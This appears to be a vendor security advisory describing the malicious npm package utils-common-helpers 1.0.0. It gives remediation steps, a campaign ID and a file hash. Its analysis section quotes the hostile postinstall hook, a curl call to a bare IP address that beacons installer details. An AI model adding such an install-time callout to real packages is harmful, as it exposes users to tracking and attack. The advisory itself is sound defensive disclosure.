Which versions of utils-common-helpers are malicious?

The following npm versions of utils-common-helpers are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate utils-common-helpers if I installed it?

Remove utils-common-helpers from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is utils-common-helpers part of a known attack campaign?

Yes — utils-common-helpers is associated with the IN-MAL-2026-006802 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect utils-common-helpers in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking utils-common-helpers and packages like it before any post-install script runs.

Malicious package

utils-common-helpersnpm

Malicious code in utils-common-helpers (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5911

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall utils-common-helpers

What this malware does

package.json declares a postinstall lifecycle hook that runs curl -s http://8.140.205.78 -o /dev/null on every install. The package's only functional code is a trivial hello() helper in index.js that returns the string 'hello', which is inconsistent with the declared purpose of 'Common utility helpers for frontend projects'. The lifecycle network call has no relation to any advertised functionality and serves only to disclose the installer's public IP address and install timing to the operator of the bare IP 8.140.205.78. This is a classic install-counter / victim-discovery beacon pattern: a throwaway lure package whose real purpose is the install-time callout. Plain HTTP to a bare IP (no TLS, no domain, no documented purpose) is inconsistent with any legitimate telemetry shape.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584

Frequently asked questions

No. utils-common-helpers on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006802

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection